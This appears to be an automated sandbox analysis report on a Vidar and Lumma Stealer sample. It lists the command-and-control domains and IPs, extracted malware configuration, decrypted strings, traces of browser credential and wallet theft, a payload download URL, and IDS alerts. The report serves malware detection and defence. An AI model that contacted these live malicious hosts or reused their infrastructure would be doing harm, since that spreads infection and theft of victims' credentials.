Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA70C40 sqlite3_bind_zeroblob,	4_2_6CA70C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA70D60 sqlite3_bind_parameter_name,	4_2_6CA70D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C998EA0 sqlite3_clear_bindings,	4_2_6C998EA0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
49.12.197.9	unknown	Germany	24940	HETZNER-ASDE	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
147.45.44.104	playd.healthnlife.pk	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
172.67.166.76	advocachark.store	United States	13335	CLOUDFLARENETUS	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
steamcommunity.com	104.102.49.254	true
playd.healthnlife.pk	147.45.44.104	true
cowod.hopto.org	45.132.206.251	true
fp2e7a.wpc.phicdn.net	192.229.221.95	true
advocachark.store	172.67.166.76	true
treatynreit.site	unknown	unknown
241.42.69.40.in-addr.arpa	unknown	unknown
mysterisop.site	unknown	unknown
chorusarorp.site	unknown	unknown
snarlypagowo.site	unknown	unknown
questionsmw.store	unknown	unknown
absorptioniw.site	unknown	unknown
abnomalrkmu.site	unknown	unknown
soldiefieop.site	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://49.12.197.9/	true		unknown
https://advocachark.store/api	true		unknown
abnomalrkmu.site	true		unknown
https://49.12.197.9/freebl3.dll	true		unknown
https://49.12.197.9/sqlp.dll	true		unknown
http://playd.healthnlife.pk/ldms/a43486128347.exe	false		unknown
https://49.12.197.9/softokn3.dll	true		unknown
absorptioniw.site	true		unknown
treatynreit.site	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
questionsmw.stor	true		unknown
https://49.12.197.9/vcruntime140.dll	true		unknown
https://49.12.197.9/nss3.dll	true		unknown
https://49.12.197.9/mozglue.dll	true		unknown

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}
Source: 16.2.MSBuild.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["treatynreit.site", "questionsmw.stor", "mysterisop.site", "soldiefieop.site", "abnomalrkmu.site", "absorptioniw.site", "snarlypagowo.site", "chorusarorp.site"], "Build id": "H8NgCl--"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\CBFCFBFBFB.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: absorptioniw.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: mysterisop.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: snarlypagowo.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: treatynreit.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: chorusarorp.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: abnomalrkmu.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: soldiefieop.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: questionsmw.stor
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: soldiefieop.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: Workgroup: -
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	4_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	4_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	4_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	4_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C896C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	4_2_6C896C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	4_2_6C9EA9A0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:56263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.76:443 -> 192.168.2.8:56266 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2221135617.000000003823A000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2215082591.000000002C352000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062735B FindFirstFileExW,	0_2_0062735B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	4_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	4_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	4_2_0040CD37
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B0735B FindFirstFileExW,	13_2_00B0735B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

4_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	0_2_00639385
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	0_2_00639385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	4_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	4_2_004014AD
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4A08D
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx esi, byte ptr [edx+eax-01h]	13_2_00B240E8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh]	13_2_00B240E8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4A004
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+20h]	13_2_00B2E1F1
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	13_2_00B2C16C
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov word ptr [edx], ax	13_2_00B42158
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4A3E0
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4A3D9
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx ecx, word ptr [edi]	13_2_00B424F8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	13_2_00B2E448
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov ebx, eax	13_2_00B22558
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov ebp, eax	13_2_00B22558
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp al, 2Eh	13_2_00B446B7
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	13_2_00B426A8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then jmp eax	13_2_00B42778
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B449E3
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	13_2_00B5EABD
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	13_2_00B1CA28
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4AA72
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	13_2_00B5EB32
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	13_2_00B5CB68
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then jmp dword ptr [00451A70h]	13_2_00B46C40
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	13_2_00B38C49
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	13_2_00B2AD3A
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B46D18
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx eax, byte ptr [ebx+edx-06h]	13_2_00B1ED08
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx esi, byte ptr [edx+ebp]	13_2_00B1ED08
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	13_2_00B32ED8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	13_2_00B3EEC8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+24h]	13_2_00B44E06
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	13_2_00B2AE05
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov word ptr [eax], dx	13_2_00B38FA8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov esi, ebx	13_2_00B60F90
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	13_2_00B370AE
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B2B034
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B41018
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	13_2_00B5D063
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov dword ptr [esp+34h], edx	13_2_00B191CA
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00B3F128
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00B3F128
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000688h]	13_2_00B352C4
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then dec ebx	13_2_00B572C8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	13_2_00B2D225
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	13_2_00B2D215
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov dword ptr [esp+08h], ecx	13_2_00B1925D
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h	13_2_00B573B8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh	13_2_00B573B8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B453BA
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov dword ptr [esp+18h], 3602043Ah	13_2_00B473A0
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov dword ptr [esp+50h], 00000000h	13_2_00B2D394
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov word ptr [eax], dx	13_2_00B393D1
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	13_2_00B5F508
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	13_2_00B59578
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+68h]	13_2_00B5F6F8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000D0h]	13_2_00B3560A
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [ebp-000000C0h]	13_2_00B277EF
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+24h]	13_2_00B458E2
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	13_2_00B618E8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_00B538C8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+54h]	13_2_00B37A89
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	13_2_00B1DAD8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_00B27AD8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	13_2_00B5BA38
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h	13_2_00B45A23
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	13_2_00B61A78
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then jmp dword ptr [0045042Ch]	13_2_00B37A4B
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	13_2_00B2BBF4
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h	13_2_00B61BF8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	13_2_00B61BF8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_00B43B2E
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp eax, C0000004h	13_2_00B35CD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B5BC78
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then xor eax, eax	13_2_00B43DCE
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B25E98
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	13_2_00B25E98
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then jmp eax	13_2_00B2DE12
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h	13_2_00B3FE00
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_00B47F88
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h	13_2_00B5BF18
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	13_2_00B5FF78

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056394 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site) : 192.168.2.8:50732 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056400 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site) : 192.168.2.8:55865 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056402 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) : 192.168.2.8:54212 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056392 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) : 192.168.2.8:54546 -> 1.1.1.1:53
